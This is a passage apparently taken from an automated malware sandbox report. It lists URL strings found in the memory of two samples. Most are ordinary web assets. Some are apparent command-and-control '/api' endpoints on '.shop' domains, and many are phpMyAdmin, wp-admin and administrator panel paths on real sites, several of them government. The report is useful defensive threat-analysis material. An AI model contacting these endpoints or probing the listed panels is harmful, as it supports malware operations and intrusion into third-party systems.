                Source: 572.exe, 00000009.00000003.4390567048.00000000391F5000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4337138614.000000004DACD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rage.mp/phpMyAdmin/
                Source: 572.exe, 00000009.00000003.4337138614.000000004DACD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rage.mp/phpMyAdmin/phpQC
                Source: 572.exe, 00000009.00000003.4196885790.0000000047AF9000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4299205287.000000004061B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
                Source: 572.exe, 00000009.00000003.4196885790.0000000047AF9000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4299205287.000000004061B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
                Source: FE8B.exe, 00000007.00000002.2647046758.00000000010F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://resergvearyinitiani.shop/
                Source: FE8B.exe, 00000007.00000002.2647046758.00000000010F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://resergvearyinitiani.shop/api
                Source: 572.exe, 00000009.00000003.4315918557.000000004E155000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4003323359.000000003911E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ro.bongacams.com/administrator
                Source: 572.exe, 00000009.00000003.4306089773.000000004E722000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ro.bongacams.com/phpmyadmin
                Source: 572.exe, 00000009.00000003.4533691780.00000000056FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ro.bongacams.com/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ro.bongacams.com/phpmyadminB
                Source: 572.exe, 00000009.00000003.4101727130.000000004E6AC000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4306089773.000000004E722000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rs.bongacams.com/phpmyadmin
                Source: 572.exe, 00000009.00000003.4306089773.000000004E722000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ru2.bongacams.com/phpmyadmin
                Source: 572.exe, 00000009.00000003.4502455045.00000000058C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.rsg.sc/auth
                Source: 572.exe, 00000009.00000003.4373068023.0000000047B9C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4502455045.00000000058C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.rsg.sc/auth/js/20240115bebh/build/
                Source: 572.exe, 00000009.00000003.4373068023.0000000047B9C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4502455045.00000000058C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.rsg.sc/auth/js/20240115bebh/build/app.3b89110af7763a7757ab.css
                Source: 572.exe, 00000009.00000003.4373068023.0000000047B9C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4502455045.00000000058C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.rsg.sc/auth/js/20240115bebh/build/app.cd19928687eacc1633ca.js
                Source: 572.exe, 00000009.00000003.4373068023.0000000047B9C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4502455045.00000000058C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.rsg.sc/auth/js/20240115bebh/build/locale-en-US-json.b896ace675a2c4c4070a.bundle.js
                Source: 572.exe, 00000009.00000003.4373068023.0000000047B9C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4502455045.00000000058C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.rsg.sc/auth/js/20240115bebh/build/runtime.01dea1afa91c8b7a7664.js
                Source: 572.exe, 00000009.00000003.4373068023.0000000047B9C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4502455045.00000000058C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.rsg.sc/auth/rockstar.ico
                Source: 572.exe, 00000009.00000003.4196885790.0000000047AF9000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4299205287.000000004061B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
                Source: 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s163-es.ogame.gameforge.com/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s163-es.ogame.gameforge.com/phpmyadmin/n
                Source: 572.exe, 00000009.00000003.2493956741.0000000002BED000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.2495235862.0000000002C13000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.2470228405.0000000003622000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.2468189486.00000000034D3000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.2496053848.0000000002C03000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.2497481349.0000000002C0F000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.2481604946.00000000038C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sabotage.net
                Source: 572.exe, 00000009.00000003.4304769446.00000000401DC000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4307098588.0000000006245000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040398000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sandbox.paywithmybank.com/;worker-src
                Source: 572.exe, 00000009.00000003.4054751612.0000000040683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sc-oauth2-client-icons-dev.storage.googleapis.com
                Source: 572.exe, 00000009.00000003.4054751612.0000000040683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sc-oauth2-client-icons.storage.googleapis.com
                Source: 572.exe, 00000009.00000003.4054751612.0000000040683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sc-static.net
                Source: 572.exe, 00000009.00000003.4373730161.0000000063DEC000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063E5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://schema.org/BreadcrumbList
                Source: 572.exe, 00000009.00000003.4373730161.0000000063DEC000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063E5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://schema.org/ListItem
                Source: 572.exe, 00000009.00000003.4054751612.0000000040683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sdk.bitmoji.com;
                Source: 572.exe, 00000009.00000003.4101727130.000000004E6AC000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4306089773.000000004E722000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://se.bongacams.com/phpmyadmin
                Source: FE8B.exe, 00000007.00000003.2450711514.0000000001133000.00000004.00000020.00020000.00000000.sdmp, FE8B.exe, 00000007.00000003.2429068251.0000000001134000.00000004.00000020.00020000.00000000.sdmp, FE8B.exe, 00000007.00000002.2647046758.0000000001135000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secretionsuitcasenioise.shop/
                Source: FE8B.exe, 00000007.00000003.2429068251.0000000001134000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secretionsuitcasenioise.shop/api
                Source: FE8B.exe, 00000007.00000003.2450711514.0000000001133000.00000004.00000020.00020000.00000000.sdmp, FE8B.exe, 00000007.00000003.2429068251.0000000001134000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secretionsuitcasenioise.shop/apib
                Source: FE8B.exe, 00000007.00000003.2429068251.0000000001134000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secretionsuitcasenioise.shop:443/api
                Source: 572.exe, 00000009.00000003.4163206048.0000000040186000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4390567048.00000000391EC000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4387562949.00000000403AE000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4286826015.000000007FDFC000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4401816982.00000000392B7000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304582370.00000000404EC000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4390567048.0000000039148000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004068B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                Source: 572.exe, 00000009.00000003.4054751612.0000000040683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sentry.sc-prod.net
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://service.uan.edu.co/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4502455045.00000000058EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://servicios.sat.gob.mx/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4502455045.00000000058EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://servicios.sat.gob.mx/phpmyadmin/2(
                Source: 572.exe, 00000009.00000003.4286826015.000000007FDF8000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4390567048.00000000391CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://servicossociais.caixa.gov.br/administrator/index.php
                Source: 572.exe, 00000009.00000003.4196885790.0000000047AF9000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4299205287.000000004061B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shared.cloudflare.steamstatic.com/
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shophappy.zoom.us
                Source: 572.exe, 00000009.00000003.4101727130.000000004E6AC000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4306089773.000000004E722000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://si.bongacams.com/phpmyadmin
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4579113128.0000000005658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sigapbanjarmasin.info/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://signin.rockstargames.com/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://signin.rockstargames.com/phpmyadmin/9
                Source: 572.exe, 00000009.00000003.4306089773.000000004E7CE000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4523052924.000000004E06F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://signin.rockstargames.com/wp-admin/
                Source: 572.exe, 00000009.00000003.4306089773.000000004E7CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://signin.rockstargames.com/wp-admin/ndex.php
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4579113128.0000000005658000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sii.ittlahuac.edu.mx/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sii.ittlahuac.edu.mx/phpmyadmin/0)vI
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sii.ittlahuac.edu.mx/phpmyadmin/Jw
                Source: 572.exe, 00000009.00000003.4390567048.0000000039128000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sistemas.pa.gov.br/administrator/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sistemas.pa.gov.br/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4101727130.000000004E6AC000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4306089773.000000004E722000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sk.bongacams.com/phpmyadmin
                Source: 572.exe, 00000009.00000003.4196885790.0000000047AF9000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4299205287.000000004061B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
                Source: 572.exe, 00000009.00000003.4054751612.0000000040683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://snap-api.arkoselabs.com
                Source: 572.exe, 00000009.00000003.4054751612.0000000040683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://snap-api.arkoselabs.com/
                Source: 572.exe, 00000009.00000003.4054751612.0000000040683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://snap-profile-manager.snapchat.com
                Source: 572.exe, 00000009.00000003.4054751612.0000000040683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://snapnet-cdn.storage.googleapis.com
                Source: 572.exe, 00000009.00000003.4298111023.000000004069A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sport.autoplay.cloud/PhpMyAdmin/
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sport.autoplay.cloud/administrator/
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sport.autoplay.cloud/administrator//index.phpHF
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sport.autoplay.cloud/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sport.autoplay.cloud/phpmyadmin/7y4
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://srienlinea.sri.gob.ec/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://srienlinea.sri.gob.ec/phpmyadmin/2e3
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://srienlinea.sri.gob.ec/phpmyadmin/je
                Source: 572.exe, 00000009.00000003.4521192060.000000004E5FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssc.nic.in/administrator/index.php
                Source: 572.exe, 00000009.00000003.4521192060.000000004E5FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssc.nic.in/administrator/index.php~
                Source: 572.exe, 00000009.00000003.4337138614.000000004DACD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssc.nic.in/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4337138614.000000004DACD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssc.nic.in/phpmyadmin/&ne
                Source: 572.exe, 00000009.00000003.4579113128.0000000005628000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl-es.hoteles.com/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005628000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl-es.hoteles.com/phpmyadmin/l
                Source: 572.exe, 00000009.00000003.4404017123.000000004E7AA000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4308254495.00000000315C1000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063E6B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.google-analytics.com/ga.js
                Source: 572.exe, 00000009.00000003.4054751612.0000000040683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
                Source: 572.exe, 00000009.00000003.4401816982.0000000039295000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://st1.zoom.us/static/5.0.94200/image/new/ZoomLogo.png
                Source: 572.exe, 00000009.00000003.4390567048.00000000391A6000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4401816982.0000000039295000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.000000004029B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://st1.zoom.us/static/6.3.19146/css/all.min.css
                Source: 572.exe, 00000009.00000003.4390567048.00000000391A6000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4401816982.0000000039295000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.000000004029B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://st1.zoom.us/static/6.3.19146/css/fonts/internacional.min.css
                Source: 572.exe, 00000009.00000003.4390567048.00000000391A6000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4401816982.0000000039295000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.000000004029B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://st1.zoom.us/static/6.3.19146/css/vue/zoom-components.min.css
                Source: 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://st1.zoom.us/static/6.3.19146/image/icon/icon-arrow-down-blue.svg
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://st1.zoom.us/static/6.3.19146/image/new/error/error404_full.jpg
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://st1.zoom.us/static/6.3.19146/js/all.min.js
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://st1.zoom.us/static/6.3.19146/js/app/common/monitor.min.js
                Source: 572.exe, 00000009.00000003.4401816982.0000000039295000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.000000004029B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://st1.zoom.us/static/6.3.19146/js/lib/vue/advanced/notification/notification.min.css
                Source: 572.exe, 00000009.00000003.4390567048.00000000391A6000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4401816982.0000000039295000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.000000004029B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://st1.zoom.us/zoom.ico
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://st2.zoom.us/cdn-detect.png
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://st2.zoom.us/static/6.3.19146/image/new/error/error404.jpg
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://st2.zoom.us/static/6.3.19146/image/new/topNav/Resources-ZoomClient.png
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://st2.zoom.us/static/6.3.19146/js/lib/vue/zoom-components.min.js
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://st3.zoom.us/static/6.3.19146
                Source: 572.exe, 00000009.00000003.4390567048.00000000391A6000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4401816982.0000000039295000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.000000004029B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://st3.zoom.us/static/6.3.19146/css/fonts/suisse.min.css
                Source: 572.exe, 00000009.00000003.4401816982.0000000039295000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.000000004029B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://st3.zoom.us/static/6.3.19146/css/top_nav.min.css
                Source: 572.exe, 00000009.00000003.4401816982.0000000039295000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.000000004029B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://st3.zoom.us/static/6.3.19146/image/icon/icon-arrow-down.svg
                Source: 572.exe, 00000009.00000003.4401816982.0000000039295000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.000000004029B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://st3.zoom.us/static/6.3.19146/image/marketing/privacyoptions.svg
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://st3.zoom.us/static/6.3.19146/image/new/topNav/Resources-VirtualBG.svg
                Source: 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://st3.zoom.us/static/6.3.19146/image/new/topNav/nav-sprites.svg
                Source: 572.exe, 00000009.00000003.4390567048.00000000391A6000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4401816982.0000000039295000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.000000004029B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://st3.zoom.us/static/6.3.19146/image/thumb.png
                Source: 572.exe, 00000009.00000003.4390567048.00000000391A6000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4401816982.0000000039295000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.000000004029B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://st3.zoom.us/static/6.3.19146/js/app/market_onetrust_cookie.min.js
                Source: 572.exe, 00000009.00000003.4401816982.0000000039295000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.000000004029B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://st3.zoom.us/static/6.3.19146/js/lib/vue/advanced/popup-captcha/popup-captcha.min.css
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://st3.zoom.us/static/6.3.19146/js/lib/vue/advanced/popup-captcha/popup-captcha.min.js
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://st3.zoom.us/static/6.3.19146/js/lib/vue/vue.min.js
                Source: 572.exe, 00000009.00000003.4288860252.0000000063FF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css
                Source: 572.exe, 00000009.00000003.4288860252.0000000063FF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js
                Source: 572.exe, 00000009.00000003.4054751612.0000000040683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://staging-us-central1-gcp.api.snapchat.com
                Source: 572.exe, 00000009.00000003.4572467958.000000000595D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.cloudflareinsights.com/beacon.min.js/v84a3a4012de94ce1a686ba8c167c359c1696973893317
                Source: 572.exe, 00000009.00000003.4299205287.000000004061B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://stats.g.doubleclick.net
                Source: 572.exe, 00000009.00000003.4028547496.0000000047B3A000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.3908338136.000000006417B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://stats.wp.com/e-202406.js
                Source: 572.exe, 00000009.00000003.4196885790.0000000047AF9000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4299205287.000000004061B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
